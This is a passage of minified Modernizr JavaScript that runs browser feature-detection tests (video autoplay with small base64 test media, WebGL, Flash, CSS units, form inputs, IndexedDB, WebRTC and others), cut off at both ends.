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";else{if(!Modernizr.video.h264)return void addTest("videoautoplay",!1);i.src="data:video/mp4;base64,AAAAHGZ0eXBtcDQyAAAAAG1wNDJpc29tYXZjMQAAAz5tb292AAAAbG12aGQAAAAAzaNacc2jWnEAAV+QAAFfkAABAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAGGlvZHMAAAAAEICAgAcAT////3//AAACQ3RyYWsAAABcdGtoZAAAAAHNo1pxzaNacQAAAAEAAAAAAAFfkAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAEAAAAAAEAAAABAAAAAAAd9tZGlhAAAAIG1kaGQAAAAAzaNacc2jWnEAAV+QAAFfkFXEAAAAAAAhaGRscgAAAAAAAAAAdmlkZQAAAAAAAAAAAAAAAAAAAAGWbWluZgAAABR2bWhkAAAAAQAAAAAAAAAAAAAAJGRpbmYAAAAcZHJlZgAAAAAAAAABAAAADHVybCAAAAABAAABVnN0YmwAAACpc3RzZAAAAAAAAAABAAAAmWF2YzEAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAEAAQAEgAAABIAAAAAAAAAAEOSlZUL0FWQyBDb2RpbmcAAAAAAAAAAAAAAAAAAAAAAAAY//8AAAAxYXZjQwH0AAr/4QAZZ/QACq609NQYBBkAAAMAAQAAAwAKjxImoAEABWjOAa8gAAAAEmNvbHJuY2xjAAYAAQAGAAAAGHN0dHMAAAAAAAAAAQAAAAUAAEZQAAAAKHN0c3oAAAAAAAAAAAAAAAUAAAIqAAAACAAAAAgAAAAIAAAACAAAAChzdHNjAAAAAAAAAAIAAAABAAAABAAAAAEAAAACAAAAAQAAAAEAAAAYc3RjbwAAAAAAAAACAAADYgAABaQAAAAUc3RzcwAAAAAAAAABAAAAAQAAABFzZHRwAAAAAAREREREAAAAb3VkdGEAAABnbWV0YQAAAAAAAAAhaGRscgAAAAAAAAAAbWRpcgAAAAAAAAAAAAAAAAAAAAA6aWxzdAAAADKpdG9vAAAAKmRhdGEAAAABAAAAAEhhbmRCcmFrZSAwLjkuOCAyMDEyMDcxODAwAAACUm1kYXQAAAHkBgX/4NxF6b3m2Ui3lizYINkj7u94MjY0IC0gY29yZSAxMjAgLSBILjI2NC9NUEVHLTQgQVZDIGNvZGVjIC0gQ29weWxlZnQgMjAwMy0yMDExIC0gaHR0cDovL3d3dy52aWRlb2xhbi5vcmcveDI2NC5odG1sIC0gb3B0aW9uczogY2FiYWM9MCByZWY9MSBkZWJsb2NrPTE6MDowIGFuYWx5c2U9MHgxOjAgbWU9ZXNhIHN1Ym1lPTkgcHN5PTAgbWl4ZWRfcmVmPTAgbWVfcmFuZ2U9NCBjaHJvbWFfbWU9MSB0cmVsbGlzPTAgOHg4ZGN0PTAgY3FtPTAgZGVhZHpvbmU9MjEsMTEgZmFzdF9wc2tpcD0wIGNocm9tYV9xcF9vZmZzZXQ9MCB0aHJlYWRzPTYgc2xpY2VkX3RocmVhZHM9MCBucj0wIGRlY2ltYXRlPTEgaW50ZXJsYWNlZD0wIGJsdXJheV9jb21wYXQ9MCBjb25zdHJhaW5lZF9pbnRyYT0wIGJmcmFtZXM9MCB3ZWlnaHRwPTAga2V5aW50PTUwIGtleWludF9taW49NSBzY2VuZWN1dD00MCBpbnRyYV9yZWZyZXNoPTAgcmM9Y3FwIG1idHJlZT0wIHFwPTAAgAAAAD5liISscR8A+E4ACAACFoAAITAAAgsAAPgYCoKgoC+L4vi+KAvi+L4YfAEAACMzgABF9AAEUGUgABDJiXnf4AAAAARBmiKUAAAABEGaQpQAAAAEQZpilAAAAARBmoKU"}}catch(o){return void addTest("videoautoplay",!1)}i.setAttribute("autoplay",""),i.style.cssText="display:none",docElement.appendChild(i),setTimeout(function(){i.addEventListener("playing",e,!1),t=setTimeout(e,n)},0)}),Modernizr.addAsyncTest(function(){if(Modernizr.webglextensions=new Boolean(!1),Modernizr.webgl){var e,t,n;try{e=createElement("canvas"),t=e.getContext("webgl")||e.getContext("experimental-webgl"),n=t.getSupportedExtensions()}catch(i){return}t!==undefined&&(Modernizr.webglextensions=new Boolean(!0));for(var r=-1,o=n.length;++r<o;)Modernizr.webglextensions[n[r]]=!0;e=undefined}}),Modernizr.addAsyncTest(function(){var e,t,n=function(e){e.fake&&e.parentNode&&e.parentNode.removeChild(e)},i=function(e,t){var n=!!e;if(n&&(n=new Boolean(n),n.blocked="blocked"===e),addTest("flash",function(){return n}),t&&l.contains(t)){for(;t.parentNode!==l;)t=t.parentNode;l.removeChild(t)}};try{t="ActiveXObject"in window&&"Pan"in new window.ActiveXObject("ShockwaveFlash.ShockwaveFlash")}catch(r){}if(e=!("plugins"in navigator&&"Shockwave Flash"in navigator.plugins||t),e||isSVG)i(!1);else{var o,s,a=createElement("embed"),l=getBody();if(a.type="application/x-shockwave-flash",l.appendChild(a),docElement.appendChild(l),!("Pan"in a||t))return i("blocked",a),void n(l);o=function(){return docElement.contains(l)?(docElement.contains(a)?(s=a.style.cssText,""!==s?i("blocked",a):i(!0,a)):i("blocked"),void n(l)):(l=document.body||l,a=createElement("embed"),a.type="application/x-shockwave-flash",l.appendChild(a),setTimeout(o,1e3))},setTimeout(o,10)}});var mq=function(){var e=window.matchMedia||window.msMatchMedia;return e?function(t){var n=e(t);return n&&n.matches||!1}:function(e){var t=!1;return injectElementWithStyles("@media "+e+" { #modernizr { position: absolute; } }",function(e){t="absolute"==(window.getComputedStyle?window.getComputedStyle(e,null):e.currentStyle).position}),t}}();ModernizrProto.mq=mq,Modernizr.addTest("mediaqueries",mq("only all"));var testStyles=ModernizrProto.testStyles=injectElementWithStyles;Modernizr.addTest("hiddenscroll",function(){return testStyles("#modernizr {width:100px;height:100px;overflow:scroll}",function(e){return e.offsetWidth===e.clientWidth})}),Modernizr.addTest("mathml",function(){var e;return testStyles("#modernizr{position:absolute;display:inline-block}",function(t){t.innerHTML+="<math><mfrac><mi>xx</mi><mi>yy</mi></mfrac></math>",e=t.offsetHeight>t.offsetWidth}),e}),Modernizr.addTest("touchevents",function(){var e;if("ontouchstart"in window||window.DocumentTouch&&document instanceof DocumentTouch)e=!0;else{var t=["@media (",prefixes.join("touch-enabled),("),"heartz",")","{#modernizr{top:9px;position:absolute}}"].join("");testStyles(t,function(t){e=9===t.offsetTop})}return e}),Modernizr.addTest("unicoderange",function(){return Modernizr.testStyles('@font-face{font-family:"unicodeRange";src:local("Arial");unicode-range:U+0020,U+002E}#modernizr span{font-size:20px;display:inline-block;font-family:"unicodeRange",monospace}#modernizr .mono{font-family:monospace}',function(e){for(var t=[".",".","m","m"],n=0;n<t.length;n++){var i=createElement("span");i.innerHTML=t[n],i.className=n%2?"mono":"",e.appendChild(i),t[n]=i.clientWidth}return t[0]!==t[1]&&t[2]===t[3]})}),Modernizr.addTest("unicode",function(){var e,t=createElement("span"),n=createElement("span");return testStyles("#modernizr{font-family:Arial,sans;font-size:300em;}",function(i){t.innerHTML=isSVG?"\u5987":"&#5987",n.innerHTML=isSVG?"\u2606":"&#9734",i.appendChild(t),i.appendChild(n),e="offsetWidth"in t&&t.offsetWidth!==n.offsetWidth}),e}),Modernizr.addTest("checked",function(){return testStyles("#modernizr {position:absolute} #modernizr input {margin-left:10px} #modernizr :checked {margin-left:20px;display:block}",function(e){var t=createElement("input");return t.setAttribute("type","checkbox"),t.setAttribute("checked","checked"),e.appendChild(t),20===t.offsetLeft})}),testStyles("#modernizr{display: table; direction: ltr}#modernizr div{display: table-cell; padding: 10px}",function(e){var t,n=e.childNodes;t=n[0].offsetLeft<n[1].offsetLeft,Modernizr.addTest("displaytable",t,{aliases:["display-table"]})},2),testStyles('#modernizr{font:0/0 a}#modernizr:after{content:":)";visibility:hidden;font:7px/1 a}',function(e){Modernizr.addTest("generatedcontent",e.offsetHeight>=7)});var blacklist=function(){var e=navigator.userAgent,t=e.match(/applewebkit\/([0-9]+)/gi)&&parseFloat(RegExp.$1),n=e.match(/w(eb)?osbrowser/gi),i=e.match(/windows phone/gi)&&e.match(/iemobile\/([0-9])+/gi)&&parseFloat(RegExp.$1)>=9,r=533>t&&e.match(/android/gi);return n||r||i}();blacklist?Modernizr.addTest("fontface",!1):testStyles('@font-face {font-family:"font";src:url("https://")}',function(e,t){var n=document.getElementById("smodernizr"),i=n.sheet||n.styleSheet,r=i?i.cssRules&&i.cssRules[0]?i.cssRules[0].cssText:i.cssText||"":"",o=/src/i.test(r)&&0===r.indexOf(t.split(" ")[0]);Modernizr.addTest("fontface",o)}),Modernizr.addTest("cssinvalid",function(){return testStyles("#modernizr input{height:0;border:0;padding:0;margin:0;width:10px} #modernizr input:invalid{width:50px}",function(e){var t=createElement("input");return t.required=!0,e.appendChild(t),t.clientWidth>10})}),testStyles("#modernizr div {width:100px} #modernizr :last-child{width:200px;display:block}",function(e){Modernizr.addTest("lastchild",e.lastChild.offsetWidth>e.firstChild.offsetWidth)},2),testStyles("#modernizr div {width:1px} #modernizr div:nth-child(2n) {width:2px;}",function(e){Modernizr.addTest("nthchild",function(){for(var t=e.getElementsByTagName("div"),n=!0,i=0;5>i;i++)n=n&&t[i].offsetWidth===i%2+1;return n})},5),testStyles("#modernizr{overflow: scroll; width: 40px; height: 40px; }#"+prefixes.join("scrollbar{width:0px} #modernizr::").split("#").slice(1).join("#")+"scrollbar{width:0px}",function(e){Modernizr.addTest("cssscrollbar",40==e.scrollWidth)}),testStyles("#modernizr{position: absolute; top: -10em; visibility:hidden; font: normal 10px arial;}#subpixel{float: left; font-size: 33.3333%;}",function(e){var t=e.firstChild;t.innerHTML="This is a text written in Arial",Modernizr.addTest("subpixelfont",window.getComputedStyle?"44px"!==window.getComputedStyle(t,null).getPropertyValue("width"):!1)},1,["subpixel"]),Modernizr.addTest("siblinggeneral",function(){return testStyles("#modernizr div {width:100px} #modernizr div ~ div {width:200px;display:block}",function(e){return 200==e.lastChild.offsetWidth},2)}),Modernizr.addTest("cssvalid",function(){return testStyles("#modernizr input{height:0;border:0;padding:0;margin:0;width:10px} #modernizr input:valid{width:50px}",function(e){var t=createElement("input");return e.appendChild(t),t.clientWidth>10})}),testStyles("#modernizr { height: 50vh; }",function(e){var t=parseInt(window.innerHeight/2,10),n=parseInt((window.getComputedStyle?getComputedStyle(e,null):e.currentStyle).height,10);Modernizr.addTest("cssvhunit",n==t)}),testStyles("#modernizr { width: 50vw; }",function(e){var t=parseInt(window.innerWidth/2,10),n=parseInt((window.getComputedStyle?getComputedStyle(e,null):e.currentStyle).width,10);Modernizr.addTest("cssvwunit",n==t)}),Modernizr.addTest("details",function(){var e,t=createElement("details");return"open"in t?(testStyles("#modernizr details{display:block}",function(n){n.appendChild(t),t.innerHTML="<summary>a</summary>b",e=t.offsetHeight,t.open=!0,e=e!=t.offsetHeight}),e):!1}),Modernizr.addTest("oninput",function(){var e,t=createElement("input");if(t.setAttribute("oninput","return"),hasEvent("oninput",docElement)||"function"==typeof t.oninput)return!0;try{var n=document.createEvent("KeyboardEvent");e=!1;var i=function(t){e=!0,t.preventDefault(),t.stopPropagation()};n.initKeyEvent("keypress",!0,!0,window,!1,!1,!1,!1,0,"e".charCodeAt(0)),docElement.appendChild(t),t.addEventListener("input",i,!1),t.focus(),t.dispatchEvent(n),t.removeEventListener("input",i,!1),docElement.removeChild(t)}catch(r){e=!1}return e}),Modernizr.addTest("formvalidation",function(){var e=createElement("form");if(!("checkValidity"in e&&"addEventListener"in e))return!1;if("reportValidity"in e)return!0;var t,n=!1;return Modernizr.formvalidationapi=!0,e.addEventListener("submit",function(e){(!window.opera||window.operamini)&&e.preventDefault(),e.stopPropagation(); },!1),e.innerHTML='<input name="modTest" required><button></button>',testStyles("#modernizr form{position:absolute;top:-99999em}",function(i){i.appendChild(e),t=e.getElementsByTagName("input")[0],t.addEventListener("invalid",function(e){n=!0,e.preventDefault(),e.stopPropagation()},!1),Modernizr.formvalidationmessage=!!t.validationMessage,e.getElementsByTagName("button")[0].click()}),n});var modElem={elem:createElement("modernizr")};Modernizr._q.push(function(){delete modElem.elem}),Modernizr.addTest("csschunit",function(){var e,t=modElem.elem.style;try{t.fontSize="3ch",e=-1!==t.fontSize.indexOf("ch")}catch(n){e=!1}return e}),Modernizr.addTest("cssexunit",function(){var e,t=modElem.elem.style;try{t.fontSize="3ex",e=-1!==t.fontSize.indexOf("ex")}catch(n){e=!1}return e});var inputElem=createElement("input"),inputattrs="autocomplete autofocus list placeholder max min multiple pattern required step".split(" "),attrs={};Modernizr.input=function(e){for(var t=0,n=e.length;n>t;t++)attrs[e[t]]=!!(e[t]in inputElem);return attrs.list&&(attrs.list=!(!createElement("datalist")||!window.HTMLDataListElement)),attrs}(inputattrs),Modernizr.addTest("datalistelem",Modernizr.input.list);var inputtypes="search tel url email datetime date month week time datetime-local number range color".split(" "),inputs={};Modernizr.inputtypes=function(e){for(var t,n,i,r=e.length,o=":)",s=0;r>s;s++)inputElem.setAttribute("type",t=e[s]),i="text"!==inputElem.type&&"style"in inputElem,i&&(inputElem.value=o,inputElem.style.cssText="position:absolute;visibility:hidden;",/^range$/.test(t)&&inputElem.style.WebkitAppearance!==undefined?(docElement.appendChild(inputElem),n=document.defaultView,i=n.getComputedStyle&&"textfield"!==n.getComputedStyle(inputElem,null).WebkitAppearance&&0!==inputElem.offsetHeight,docElement.removeChild(inputElem)):/^(search|tel)$/.test(t)||(i=/^(url|email|number)$/.test(t)?inputElem.checkValidity&&inputElem.checkValidity()===!1:inputElem.value!=o)),inputs[e[s]]=!!i;return inputs}(inputtypes),Modernizr.addTest("localizednumber",function(){if(!Modernizr.inputtypes.number)return!1;if(!Modernizr.formvalidation)return!1;var e,t=createElement("div"),n=getBody(),i=function(){return docElement.insertBefore(n,docElement.firstElementChild||docElement.firstChild)}();t.innerHTML='<input type="number" value="1.0" step="0.1"/>';var r=t.childNodes[0];i.appendChild(t),r.focus();try{document.execCommand("InsertText",!1,"1,1")}catch(o){}return e="number"===r.type&&1.1===r.valueAsNumber&&r.checkValidity(),i.removeChild(t),n.fake&&i.parentNode.removeChild(i),e}),Modernizr.addTest("hsla",function(){var e=createElement("a").style;return e.cssText="background-color:hsla(120,40%,100%,.5)",contains(e.backgroundColor,"rgba")||contains(e.backgroundColor,"hsla")}),testStyles("#modernizr1{width: 50vmax}#modernizr2{width:50px;height:50px;overflow:scroll}#modernizr3{position:fixed;top:0;left:0;bottom:0;right:0}",function(e){var t=e.childNodes[2],n=e.childNodes[1],i=e.childNodes[0],r=parseInt((n.offsetWidth-n.clientWidth)/2,10),o=i.clientWidth/100,s=i.clientHeight/100,a=parseInt(50*Math.max(o,s),10),l=parseInt((window.getComputedStyle?getComputedStyle(t,null):t.currentStyle).width,10);Modernizr.addTest("cssvmaxunit",roundedEquals(a,l)||roundedEquals(a,l-r))},3),testStyles("#modernizr1{width: 50vm;width:50vmin}#modernizr2{width:50px;height:50px;overflow:scroll}#modernizr3{position:fixed;top:0;left:0;bottom:0;right:0}",function(e){var t=e.childNodes[2],n=e.childNodes[1],i=e.childNodes[0],r=parseInt((n.offsetWidth-n.clientWidth)/2,10),o=i.clientWidth/100,s=i.clientHeight/100,a=parseInt(50*Math.min(o,s),10),l=parseInt((window.getComputedStyle?getComputedStyle(t,null):t.currentStyle).width,10);Modernizr.addTest("cssvminunit",roundedEquals(a,l)||roundedEquals(a,l-r))},3);var testXhrType=function(e){if("undefined"==typeof XMLHttpRequest)return!1;var t=new XMLHttpRequest;t.open("get","/",!0);try{t.responseType=e}catch(n){return!1}return"response"in t&&t.responseType==e};Modernizr.addTest("xhrresponsetypearraybuffer",testXhrType("arraybuffer")),Modernizr.addTest("xhrresponsetypeblob",testXhrType("blob")),Modernizr.addTest("xhrresponsetypedocument",testXhrType("document")),Modernizr.addTest("xhrresponsetypejson",testXhrType("json")),Modernizr.addTest("xhrresponsetypetext",testXhrType("text"));var toStringFn={}.toString;Modernizr.addTest("svgclippaths",function(){return!!document.createElementNS&&/SVGClipPath/.test(toStringFn.call(document.createElementNS("http://www.w3.org/2000/svg","clipPath")))}),Modernizr.addTest("svgforeignobject",function(){return!!document.createElementNS&&/SVGForeignObject/.test(toStringFn.call(document.createElementNS("http://www.w3.org/2000/svg","foreignObject")))}),Modernizr.addTest("smil",function(){return!!document.createElementNS&&/SVGAnimate/.test(toStringFn.call(document.createElementNS("http://www.w3.org/2000/svg","animate")))});var mStyle={style:modElem.elem.style};Modernizr._q.unshift(function(){delete mStyle.style});var testProp=ModernizrProto.testProp=function(e,t,n){return testProps([e],undefined,t,n)};Modernizr.addTest("textshadow",testProp("textShadow","1px 1px")),ModernizrProto.testAllProps=testPropsAll;var prefixed=ModernizrProto.prefixed=function(e,t,n){return 0===e.indexOf("@")?atRule(e):(-1!=e.indexOf("-")&&(e=cssToDOM(e)),t?testPropsAll(e,t,n):testPropsAll(e,"pfx"))},prefixedCSS=ModernizrProto.prefixedCSS=function(e){var t=prefixed(e);return t&&domToCSS(t)};Modernizr.addTest("batteryapi",!!prefixed("battery",navigator),{aliases:["battery-api"]}),Modernizr.addTest("dart",!!prefixed("startDart",navigator)),Modernizr.addTest("fullscreen",!(!prefixed("exitFullscreen",document,!1)&&!prefixed("cancelFullScreen",document,!1))),Modernizr.addTest("gamepads",!!prefixed("getGamepads",navigator));var indexeddb=prefixed("indexedDB",window);Modernizr.addTest("indexeddb",!!indexeddb),indexeddb&&Modernizr.addTest("indexeddb.deletedatabase","deleteDatabase"in indexeddb),Modernizr.addAsyncTest(function(){var e,t,n=prefixed("indexedDB",window),i="detect-blob-support",r=!1;if(!Modernizr.indexeddb||!Modernizr.indexeddb.deleteDatabase)return!1;try{n.deleteDatabase(i).onsuccess=function(){e=n.open(i,1),e.onupgradeneeded=function(){e.result.createObjectStore("store")},e.onsuccess=function(){t=e.result;try{t.transaction("store","readwrite").objectStore("store").put(new Blob,"key"),r=!0}catch(o){r=!1}finally{addTest("indexeddbblob",r),t.close(),n.deleteDatabase(i)}}}}catch(o){addTest("indexeddbblob",!1)}}),Modernizr.addTest("intl",!!prefixed("Intl",window)),Modernizr.addTest("pagevisibility",!!prefixed("hidden",document,!1)),Modernizr.addTest("performance",!!prefixed("performance",window)),Modernizr.addTest("pointerlock",!!prefixed("exitPointerLock",document)),Modernizr.addTest("quotamanagement",function(){var e=prefixed("temporaryStorage",navigator),t=prefixed("persistentStorage",navigator);return!(!e||!t)}),Modernizr.addTest("requestanimationframe",!!prefixed("requestAnimationFrame",window),{aliases:["raf"]}),Modernizr.addTest("vibrate",!!prefixed("vibrate",navigator)),Modernizr.addTest("webintents",!!prefixed("startActivity",navigator)),Modernizr.addTest("lowbattery",function(){var e=.2,t=prefixed("battery",navigator);return!!(t&&!t.charging&&t.level<=e)});var crypto=prefixed("crypto",window),supportsGetRandomValues;if(crypto&&"getRandomValues"in crypto&&"Uint32Array"in window){var array=new Uint32Array(10),values=crypto.getRandomValues(array);supportsGetRandomValues=values&&is(values[0],"number")}Modernizr.addTest("getrandomvalues",!!supportsGetRandomValues),Modernizr.addTest("backgroundblendmode",prefixed("backgroundBlendMode","text")),Modernizr.addTest("objectfit",!!prefixed("objectFit"),{aliases:["object-fit"]}),Modernizr.addTest("wrapflow",function(){var e=prefixed("wrapFlow");if(!e||isSVG)return!1;var t=e.replace(/([A-Z])/g,function(e,t){return"-"+t.toLowerCase()}).replace(/^ms-/,"-ms-"),n=createElement("div"),i=createElement("div"),r=createElement("span");i.style.cssText="position: absolute; left: 50px; width: 100px; height: 20px;"+t+":end;",r.innerText="X",n.appendChild(i),n.appendChild(r),docElement.appendChild(n);var o=r.offsetLeft;return docElement.removeChild(n),i=r=n=undefined,150==o}),Modernizr.addTest("filesystem",!!prefixed("requestFileSystem",window)),Modernizr.addTest("requestautocomplete",!!prefixed("requestAutocomplete",createElement("form"))),Modernizr.addTest("speechrecognition",!!prefixed("SpeechRecognition",window));var url=prefixed("URL",window,!1);url=url&&window[url],Modernizr.addTest("bloburls",url&&"revokeObjectURL"in url&&"createObjectURL"in url),Modernizr.addAsyncTest(function(){function e(){addTest("transferables",!1),t()}function t(){a&&URL.revokeObjectURL(a),l&&l.terminate(),r&&clearTimeout(r)}var n=!!(Modernizr.blobconstructor&&Modernizr.bloburls&&Modernizr.webworkers&&Modernizr.typedarrays);if(!n)return addTest("transferables",!1);try{var i,r,o='var hello = "world"',s=new Blob([o],{type:"text/javascript"}),a=URL.createObjectURL(s),l=new Worker(a);l.onerror=e,r=setTimeout(e,200),i=new ArrayBuffer(1),l.postMessage(i,[i]),addTest("transferables",0===i.byteLength),t()}catch(d){e()}}),Modernizr.addTest("getusermedia",!!prefixed("getUserMedia",navigator)),Modernizr.addTest("matchmedia",!!prefixed("matchMedia",window)),Modernizr.addTest("peerconnection",!!prefixed("RTCPeerConnection",window)),Modernizr.addTest("datachannel",function(){if(!Modernizr.peerconnection)return!1;for(var e=0,t=domPrefixes.length;t>e;e++){var n=window[domPrefixes[e]+"RTCPeerConnection"];if(n){var i=new n({iceServers:[{url:"stun:0"}]});return"createDataChannel"in i}}return!1}),ModernizrProto.testAllProps=testAllProps,Modernizr.addTest("cssanimations",testAllProps("animationName","a",!0)),Modernizr.addTest("csspseudoanimations",function(){var e=!1;if(!Modernizr.cssanimations||!window.getComputedStyle)return e;var t=["@",Modernizr._prefixes.join("keyframes csspseudoanimations { from { font-size: 10px; } }@").replace(/\@$/,""),'#modernizr:before { content:" "; font-size:5px;',Modernizr._prefixes.join("animation:csspseudoanimations 1ms infinite;"),"}"].join("");return Modernizr.testStyles(t,function(t){e="10px"===window.getComputedStyle(t,":before").getPropertyValue("font-size")}),e}),Modernizr.addTest("backdropfilter",testAllProps("backdropFilter")),Modernizr.addTest("appearance",testAllProps("appearance")),Modernizr.addTest("backgroundcliptext",function(){return testAllProps("backgroundClip","text")}),Modernizr.addTest("bgpositionxy",function(){return testAllProps("backgroundPositionX","3px",!0)&&testAllProps("backgroundPositionY","5px",!0)}),Modernizr.addTest("bgrepeatround",testAllProps("backgroundRepeat","round")),Modernizr.addTest("bgrepeatspace",testAllProps("backgroundRepeat","space")),Modernizr.addTest("backgroundsize",testAllProps("backgroundSize","100%",!0)),Modernizr.addTest("bgsizecover",testAllProps("backgroundSize","cover")),Modernizr.addTest("borderimage",testAllProps("borderImage","url() 1",!0)),Modernizr.addTest("borderradius",testAllProps("borderRadius","0px",!0)),Modernizr.addTest("boxsizing",testAllProps("boxSizing","border-box",!0)&&(document.documentMode===undefined||document.documentMode>7)),Modernizr.addTest("boxshadow",testAllProps("boxShadow","1px 1px",!0)),function(){Modernizr.addTest("csscolumns",function(){var e=!1,t=testAllProps("columnCount");try{(e=!!t)&&(e=new Boolean(e))}catch(n){}return e});for(var e,t,n=["Width","Span","Fill","Gap","Rule","RuleColor","RuleStyle","RuleWidth","BreakBefore","BreakAfter","BreakInside"],i=0;i<n.length;i++)e=n[i].toLowerCase(),t=testAllProps("column"+n[i]),("breakbefore"===e||"breakafter"===e||"breakinside"==e)&&(t=t||testAllProps(n[i])),Modernizr.addTest("csscolumns."+e,t)}(),Modernizr.addTest("displayrunin",testAllProps("display","run-in"),{aliases:["display-runin"]}),Modernizr.addTest("ellipsis",testAllProps("textOverflow","ellipsis")),Modernizr.addTest("cssfilters",function(){if(Modernizr.supports)return testAllProps("filter","blur(2px)");var e=createElement("a");return e.style.cssText=prefixes.join("filter:blur(2px); "),!!e.style.length&&(document.documentMode===undefined||document.documentMode>9)}),Modernizr.addTest("flexbox",testAllProps("flexBasis","1px",!0)),Modernizr.addTest("flexboxtweener",testAllProps("flexAlign","end",!0)),Modernizr.addTest("flexboxlegacy",testAllProps("boxDirection","reverse",!0)),Modernizr.addTest("flexwrap",testAllProps("flexWrap","wrap",!0)),Modernizr.addAsyncTest(function(){function e(){function n(){try{var e=createElement("div"),t=createElement("span"),n=e.style,i=0,r=0,o=!1,s=document.body.firstElementChild||document.body.firstChild;return e.appendChild(t),t.innerHTML="Bacon ipsum dolor sit amet jerky velit in culpa hamburger et. Laborum dolor proident, enim dolore duis commodo et strip steak. Salami anim et, veniam consectetur dolore qui tenderloin jowl velit sirloin. Et ad culpa, fatback cillum jowl ball tip ham hock nulla short ribs pariatur aute. Pig pancetta ham bresaola, ut boudin nostrud commodo flank esse cow tongue culpa. Pork belly bresaola enim pig, ea consectetur nisi. Fugiat officia turkey, ea cow jowl pariatur ullamco proident do laborum velit sausage. Magna biltong sint tri-tip commodo sed bacon, esse proident aliquip. Ullamco ham sint fugiat, velit in enim sed mollit nulla cow ut adipisicing nostrud consectetur. Proident dolore beef ribs, laborum nostrud meatball ea laboris rump cupidatat labore culpa. Shankle minim beef, velit sint cupidatat fugiat tenderloin pig et ball tip. Ut cow fatback salami, bacon ball tip et in shank strip steak bresaola. In ut pork belly sed mollit tri-tip magna culpa veniam, short ribs qui in andouille ham consequat. Dolore bacon t-bone, velit short ribs enim strip steak nulla. Voluptate labore ut, biltong swine irure jerky. Cupidatat excepteur aliquip salami dolore. Ball tip strip steak in 